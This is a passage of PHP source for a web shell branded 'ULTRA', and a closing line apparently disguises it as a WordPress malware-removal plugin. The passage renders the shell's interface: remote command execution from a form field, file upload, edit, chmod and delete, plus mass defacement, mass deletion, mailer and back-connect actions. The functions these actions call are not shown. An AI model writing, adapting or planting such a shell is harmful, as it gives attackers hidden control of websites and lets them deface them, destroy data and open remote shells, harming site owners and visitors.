    ?>&item=<?php 
    echo $dir;
    ?>&action=massdeface" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-layer-group"></i> Mass Deface</a>
                            <a href="?dir=<?php 
    echo $path;
    ?>&item=<?php 
    echo $dir;
    ?>&action=massdelete" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-eraser"></i> Mass Delete</a>
                            <a href="?dir=<?php 
    echo $path;
    ?>&item=<?php 
    echo $dir;
    ?>&action=mail" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-envelope"></i> Email Test</a>
                            <a href="?dir=<?php 
    echo $path;
    ?>&item=<?php 
    echo $dir;
    ?>&action=backconnect" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-network-wired"></i> Back Connect</a>
                        </div>
                        <center>
                            <hr width='20%'>
                        </center>

                        <div class="container" id="tools">
                            <!-- endif -->
                            <?php 
    if (isset($_GET['action']) && $_GET['action'] != 'download') {
        $action = $_GET['action'];
        ?>
                            <?php 
    }
    ?>
                            <?php 
    if (isset($_GET['action']) && $_GET['action'] != 'delete') {
        $action = $_GET['action'];
        ?>

                                <div class="col-md-12">
                                    <div class="row justify-content-center">
                                        <?php 
        if ($action == 'rename' && isset($_GET['item'])) {
            ?>

                                            <div class="col-md-5">
                                                <form action="" method="post">
                                                    <div class="mb-3">
                                                        <label for="name" class="form-label">New Name</label>
                                                        <input type="text" class="form-control" name="newName" value="<?php 
            echo $_GET['item'];
            ?>">
                                                    </div>
                                                    <button type="submit" class="btn btn-outline-light">Submit</button>
                                                    <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
                                                </form>
                                            </div>
                                        <?php 
        } elseif ($action == 'edit' && isset($_GET['item'])) {
            ?>

                                            <div class="col-md-5">
                                                <form action="" method="post">
                                                    <div class="mb-3">
                                                        <label for="name" class="form-label"><?php 
            echo $_GET['item'];
            ?></label>
                                                        <textarea id="CopyFromTextArea" name="newContent" rows="10" class="form-control"><?php 
            echo htmlspecialchars(file_get_contents($path . '/' . $_GET['item']));
            ?></textarea>
                                                    </div>
                                                    <button type="submit" class="btn btn-outline-light">Submit</button>
                                                    <button type="button" class="btn btn-outline-light" onclick="jscopy()">Copy</button>
                                                    <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
                                                </form>
                                            </div>
                                        <?php 
        } elseif ($action == 'chmod' && isset($_GET['item'])) {
            ?>

                                            <div class="col-md-5">
                                                <form action="" method="post">
                                                    <div class="mb-3">
                                                        <label for="name" class="form-label"><?php 
            echo $_GET['item'];
            ?></label>
                                                        <input type="text" class="form-control" name="newPerm" value="<?php 
            echo substr(sprintf('%o', fileperms($_GET['item'])), 4);
            ?>">
                                                    </div>
                                                    <button type="submit" class="btn btn-outline-light">Submit</button>
                                                    <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
                                                </form>
                                            </div>
                                        <?php 
        } elseif ($action == 'upload') {
            ?>

                                            <div class="col-md-5">
                                                <form action="" method="post" enctype="multipart/form-data">
                                                    <div class="mb-3">
                                                        <label class="form-label">File Uploader</label>
                                                        <div class="input-group">
                                                            <input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload" multiple>
                                                            <button class="btn btn-outline-light" type="submit" id="inputGroupFileAddon04">Upload</button>
                                                        </div>
                                                    </div>
                                                </form>
                                            </div>
                                        <?php 
        } elseif ($action == 'command') {
            ?>

                                            <div class="col-md-5">
                                                <form action="" method="post">
                                                    <div class="mb-3">
                                                        <label class="form-label">Command</label>
                                                        <div class="input-group">
                                                            <input type="text" class="form-control form-control-sm" name="ucmd" placeholder="whoami">
                                                            <button class="btn btn-outline-light" type="submit">Submit</button>
                                                        </div>
                                                    </div>
                                                </form>
                                            </div>
                                        <?php 
        } elseif ($action == 'massdeface') {
            ?>

                                            <?php 
            massdeface($path);
            ?>
                                        <?php 
        } elseif ($action == 'massdelete') {
            ?>

                                            <?php 
            massdelete($path);
            ?>
                                        <?php 
        } elseif ($action == 'mail') {
            ?>

                                            <?php 
            mailer($serv);
            ?>
                                        <?php 
        } elseif ($action == 'backconnect') {
            ?>

                                            <div class="col-md-5">
                                                <!-- end php -->
                                                <?php 
            bctool();
            ?>

                                            </div>
                                        <!-- endif -->
                                        <?php 
        }
        ?>

                                    </div>
                                </div>
                            <!-- endif -->
                            <?php 
    }
    ?>

                            <!-- command -->
                            <?php 
    if (isset($_POST['ucmd'])) {
        ?>
                            <div class="p-2">
                                <div class="row justify-content-center">
                                    <div class="card text-dark col-md-7 mb-3">
                                        <pre><?php 
        echo $ip . "@" . $serv . ":&nbsp;~\$&nbsp;";
        echo $cmd = $_POST['ucmd'];
        $cmd . "<br>";
        ?><br><br><code><?php 
        echo cmd($cmd);
        ?></code></pre>
                                    </div>
                                </div>
                            </div>
                            <!-- endif -->
                            <?php 
    }
    ?>

                            <!-- new file -->
                            <div class="col-md-12">
                                <div class="collapse" id="newFileCollapse" data-bs-parent="#tools">
                                    <div class="row justify-content-center">
                                        <div class="col-md-5">
                                            <form action="" method="post">
                                                <div class="mb-3">
                                                    <label class="form-label">File Name</label>
                                                    <input type="text" class="form-control" name="newFileName" placeholder="test.php">
                                                </div>
                                                <div class="mb-3">
                                                    <label class="form-label">File Content</label>
                                                    <textarea class="form-control" rows="7" name="newFileContent" placeholder="Hello-World"></textarea>
                                                </div>
                                                <button type="submit" class="btn btn-outline-light">Create</button>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <!-- new folder -->
                            <div class="col-md-12">
                                <div class="collapse" id="newFolderCollapse" data-bs-parent="#tools">
                                    <div class="row justify-content-center">
                                        <div class="col-md-5">
                                            <form action="" method="post">
                                                <div class="mb-3">
                                                    <label class="form-label">Folder Name</label>
                                                    <input type="text" class="form-control" name="newFolderName" placeholder="home">
                                                </div>
                                                <button type="submit" class="btn btn-outline-light">Create</button>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                    <!-- file manager -->
                    <div class="table-responsive mt-3">
                        <table class="table table-hover table-dark align-middle text-light">
                            <thead class="align-middle">
                                <tr>
                                    <td style="width:35%">Name</td>
                                    <td style="width:10%">Type</td>
                                    <td style="width:10%">Size</td>
                                    <td style="width:13%">Owner/Group</td>
                                    <td style="width:10%">Permission</td>
                                    <td style="width:13%">Last Modified</td>
                                    <td style="width:9%">Actions</td>
                                </tr>
                            </thead>
                            <tbody class="text-nowrap">
                                <!-- end php -->
                                <?php 
    foreach ($dirs as $dir) {
        if (!is_dir($dir)) {
            continue;
        }
        ?>

                                <tr>
                                    <td>
                                        <?php 
        if ($dir === '..') {
            ?>

                                            <a href="?dir=<?php 
            echo dirname($path);
            ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?php 
            echo $dir;
            ?></a>
                                        <?php 
        } elseif ($dir === '.') {
            ?>

                                            <a href="?dir=<?php 
            echo $path;
            ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?php 
            echo $dir;
            ?></a>
                                        <?php 
        } else {
            ?>

                                            <a href="?dir=<?php 
            echo $path . '/' . $dir;
            ?>" class="text-decoration-none text-light"><i class="fa fa-folder"></i> <?php 
            echo $dir;
            ?></a>
                                        <!-- endif -->
                                        <?php 
        }
        ?>

                                    </td>
                                    <td class="text-light"><?php 
        echo filetype($dir);
        ?></td>
                                    <td class="text-light">-</td>
                                    <td class="text-light"><?php 
        echo getOwner($dir);
        ?></td>
                                    <td class="text-light">
                                    <!-- end php -->
                                        <?php 
        echo '<a href="?dir=' . $path . '&item=' . $dir . '&action=chmod">';
        if (is_writable($path . '/' . $dir)) {
            echo '<font color="lime">';
        } elseif (!is_readable($path . '/' . $dir)) {
            echo '<font color="red">';
        }
        echo perms($path . '/' . $dir);
        if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) {
            echo '</a>';
        }
        ?>

                                    </td>
                                    <td class="text-light"><?php 
        echo date("Y-m-d h:i:s", filemtime($dir));
        ?></td>
                                    <td>
                                        <?php 
        if ($dir != '.' && $dir != '..') {
            ?>

                                            <div class="btn-group">
                                                <a href="?dir=<?php 
            echo $path;
            ?>&item=<?php 
            echo $dir;
            ?>&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a>
                                                <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?php 
            echo $path;
            ?>&item=<?php 
            echo $dir;
            ?>&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a>
                                            </div>
                                        <?php 
        } elseif ($dir === '.') {
            ?>

                                            <div class="btn-group">
                                                <a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New Folder"><i class="fa fa-folder-plus"></i></a>
                                                <a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New File"><i class="fa fa-file-plus"></i></a>
                                            </div>
                                        <!-- endif -->
                                        <?php 
        }
        ?>

                                    </td>
                                </tr>
                                <!-- endforeach -->
                                <?php 
    }
    ?>
                                    <!-- end php -->
                                    <?php 
    foreach ($dirs as $dir) {
        if (!is_file($dir)) {
            continue;
        }
        ?>

                                    <tr>
                                        <td>
                                            <a href="?dir=<?php 
        echo $path;
        ?>&item=<?php 
        echo $dir;
        ?>&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> <?php 
        echo $dir;
        ?></a>
                                        </td>
                                        <td class="text-light"><?php 
        echo function_exists('mime_content_type') ? mime_content_type($dir) : filetype($dir);
        ?></td>
                                        <td class="text-light"><?php 
        echo fsize($dir);
        ?></td>
                                        <td class="text-light"><?php 
        echo getOwner($dir);
        ?></td>
                                        <td class="text-light">
                                        <!-- end php -->
                                            <?php 
        echo '<a href="?dir=' . $path . '&item=' . $dir . '&action=chmod">';
        if (is_writable($path . '/' . $dir)) {
            echo '<font color="lime">';
        } elseif (!is_readable($path . '/' . $dir)) {
            echo '<font color="red">';
        }
        echo perms($path . '/' . $dir);
        if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) {
            echo '</a>';
        }
        ?>

                                        </td>
                                        <td class="text-light"><?php 
        echo date("Y-m-d h:i:s", filemtime($dir));
        ?></td>
                                        <td>
                                            <?php 
        if ($dir != '.' && $dir != '..') {
            ?>

                                                <div class="btn-group">
                                                    <a href="?dir=<?php 
            echo $path;
            ?>&item=<?php 
            echo $dir;
            ?>&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a>
                                                    <a href="?dir=<?php 
            echo $path;
            ?>&item=<?php 
            echo $dir;
            ?>&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a>
                                                    <a href="?dir=<?php 
            echo $path;
            ?>&item=<?php 
            echo $dir;
            ?>&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a>
                                                    <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?php 
            echo $path;
            ?>&item=<?php 
            echo $dir;
            ?>&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a>
                                                </div>
                                            <!-- endif -->
                                            <?php 
        }
        ?>

                                        </td>
                                    </tr>
                                <!-- endforeach -->
                                <?php 
    }
    ?>

                            </tbody>
                        </table>
                    </div>
                    <center><div class="text-light my-1">&#169; ULTRA</div></center>
                </div>
            </div>
        </div>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script>
        <script>
            <?php 
    if (isset($_SESSION['message'])) {
        ?>
                Swal.fire(
                '<?php 
        echo $_SESSION['status'];
        ?>',
                '<?php 
        echo $_SESSION['message'];
        ?>',
                '<?php 
        echo $_SESSION['class'];
        ?>'
                )
            <?php 
    }
    clear();
    ?>

            function deleteConfirm(url) {
                event.preventDefault()
                Swal.fire({
                    title: 'Are you sure?',
                    icon: 'warning',
                    showCancelButton: true,
                    confirmButtonColor: '#3085d6',
                    cancelButtonColor: '#d33',
                    confirmButtonText: 'Yes, delete it!'
                }).then((result) => {
                    if (result.isConfirmed) {
                        window.location.href = url
                    }
                })
            }

            function jscopy() {
                var jsCopy = document.getElementById("CopyFromTextArea");
                jsCopy.focus();
                jsCopy.select();
                document.execCommand("copy");
            }

        </script>
    </body>
</html><?php 
};
exit;


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.